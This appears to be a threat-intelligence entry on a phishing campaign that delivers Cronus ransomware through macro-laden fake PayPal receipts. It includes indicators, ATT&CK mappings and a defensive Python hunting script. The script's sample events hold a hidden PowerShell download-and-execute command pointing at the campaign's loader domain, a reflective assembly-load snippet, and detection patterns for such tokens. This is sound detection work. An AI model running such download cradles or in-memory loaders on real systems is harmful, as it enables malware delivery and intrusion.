Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
Aug. 7, 2024, 8:37 a.m.
Description
The analysis describes a campaign that uses fake PayPal receipts as phishing lures to deliver a new variant of the Cronus ransomware. The infection chain starts with a malicious Word attachment whose obfuscated VBA macro downloads a PowerShell loader from a remote server (the loader URL and its domain are listed under Indicators). The loader uses reflective DLL loading to run the ransomware payload entirely in memory, so the ransomware binary itself is never written to disk and file-based scanning never sees it; the lure document, the macro's outbound download and the PowerShell activity it spawns remain the observable artifacts. Once running, the ransomware enumerates and encrypts targeted file types, terminates processes, establishes persistence, and manipulates clipboard contents.
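The chain above (Office macro, PowerShell download cradle, in-memory load) maps onto a few concrete telemetry checks. The script below is an added hunting example, not code from the report or from the Cronus analysis: it applies the entry's file hashes and loader domain as indicators, and adds generic behavioural heuristics (Office parent spawning a script host, download-cradle tokens, reflective-load tokens) that are this example's own assumptions rather than strings the report attributes to Cronus. The event records and sample events are constructed here; the field names mimic Sysmon process-creation and PowerShell script-block logging but nothing is tied to a vendor API.

```python
"""
Added hunting example (not from the original report). Applies the entry's
indicators plus generic behavioural heuristics to constructed, Sysmon-like
process-creation events and PowerShell script-block events.
"""
import re
from dataclasses import dataclass

# Indicators copied from the entry: SHA-256 hashes, and the loader domain.
IOC_SHA256 = {
    "dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3",
    "afb95b1b2092020ed98312602c300f51daca14bb3d65503df3c5ca4776027987",
    "9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb",
    "69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3",
    "629587e592130b86418d17d6b8cc52b6f378f39f1b5e8caa4038cfa7120b2a53",
    "42551531be1c5abfdd24a3465788c659a038141de61976787b0862664df95aad",
}
IOC_DOMAINS = {"eternal.lol"}

# Office applications that should not normally launch a script interpreter
# (assumption of this example, not a list from the report).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Download-cradle tokens commonly seen in macro-launched PowerShell (generic heuristic).
CRADLE_RE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Invoke-Expression|\biex\b|-enc(odedcommand)?\b|FromBase64String)", re.I)
# Tokens typical of loading a PE/assembly from memory rather than from disk (generic heuristic).
INMEM_RE = re.compile(
    r"(Reflection\.Assembly\]::Load\b|VirtualAlloc|WriteProcessMemory|NtUnmapViewOfSection)", re.I)


@dataclass
class Event:
    kind: str                 # "process" (creation) or "scriptblock"
    image: str = ""           # full path of the created process
    parent_image: str = ""    # full path of the parent process
    command_line: str = ""
    sha256: str = ""          # hash of the created process image, if logged
    script_text: str = ""     # PowerShell script-block contents


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(event: Event) -> list:
    """Return the detection labels that fire on a single event, in a fixed order."""
    hits = []
    if event.kind == "process":
        if event.sha256.lower() in IOC_SHA256:
            hits.append("ioc-hash")
        parent, child = _basename(event.parent_image), _basename(event.image)
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            hits.append("office-spawns-script-host")
        if CRADLE_RE.search(event.command_line):
            hits.append("download-cradle")
        if any(d in event.command_line.lower() for d in IOC_DOMAINS):
            hits.append("ioc-domain")
    elif event.kind == "scriptblock":
        if INMEM_RE.search(event.script_text):
            hits.append("in-memory-load")
        if any(d in event.script_text.lower() for d in IOC_DOMAINS):
            hits.append("ioc-domain")
    return hits


def hunt(events) -> dict:
    """Map event index -> labels, for every event that triggers at least one label."""
    return {i: h for i, e in enumerate(events) if (h := analyze(e))}


# Constructed sample events for illustration; none are real telemetry.
SAMPLE_EVENTS = [
    Event("process",
          image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          command_line='powershell -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                       '.DownloadString(\'https://eternal.lol/file/\')"'),
    Event("process",
          image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Windows\explorer.exe",
          command_line=r"powershell -NoProfile -File C:\scripts\backup.ps1"),
    Event("scriptblock",
          script_text="$asm = [System.Reflection.Assembly]::Load($bytes); "
                      "$asm.EntryPoint.Invoke($null, $null)"),
    Event("process",
          image=r"C:\Users\Public\invoice.exe",
          parent_image=r"C:\Windows\explorer.exe",
          command_line=r"C:\Users\Public\invoice.exe",
          sha256="dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3"),
]

if __name__ == "__main__":
    for idx, labels in hunt(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(labels)}")
```

The indicator match alone catches only the hashed samples; the parent-child and cradle checks are what surface a fresh build of the same chain, which is the point of a fileless payload entry. Expect the cradle regex to fire on legitimate admin tooling too, so pair it with the Office-parent condition before alerting.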
Date
Published: Aug. 7, 2024, 8:32 a.m.
Created: Aug. 7, 2024, 8:32 a.m.
Modified: Aug. 7, 2024, 8:37 a.m.
Indicators
SHA-256: dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3
SHA-256: afb95b1b2092020ed98312602c300f51daca14bb3d65503df3c5ca4776027987
SHA-256: 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb
SHA-256: 69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3
SHA-256: 629587e592130b86418d17d6b8cc52b6f378f39f1b5e8caa4038cfa7120b2a53
SHA-256: 42551531be1c5abfdd24a3465788c659a038141de61976787b0862664df95aad
URL: https://eternal.lol/file/
Domain: eternal.lol
Attack Patterns
Cronus Ransomware
Cronus
T1491.001 Defacement: Internal Defacement
T1565.002 Data Manipulation: Transmitted Data Manipulation
T1055.012 Process Injection: Process Hollowing
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1204.002 User Execution: Malicious File
T1486 Data Encrypted for Impact
T1057 Process Discovery
T1566.001 Phishing: Spearphishing Attachment
T1083 File and Directory Discovery